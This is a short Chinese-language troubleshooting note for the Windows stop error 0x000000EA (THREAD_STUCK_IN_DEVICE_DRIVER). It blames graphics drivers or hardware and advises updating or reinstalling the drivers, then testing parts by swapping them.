0x000000EA 錯誤表示顯示驅動程序遇到了問題。這個錯誤一般是因為顯卡或顯示器的驅動程序存在BUG或安裝不正確引起的。如果遇到0x000000EA錯誤,建議在Windows中重新安裝顯卡及顯示器驅動程序,看看問題能否解決;如果故障依舊,請使用「替換法」檢測計算機的顯卡、顯示器及主板的PCIE或AGP介面是否工作正常。
--------------------------------------------------------
0x000000EA:THREAD_STUCK_IN_DEVICE_DRIVER
◆錯誤分析:通常是由顯卡或顯卡驅動程序引發的.
◇解決方案:先升級最新的顯卡驅動, 如果不行, 則需要更換顯卡測試故障是否依然發生.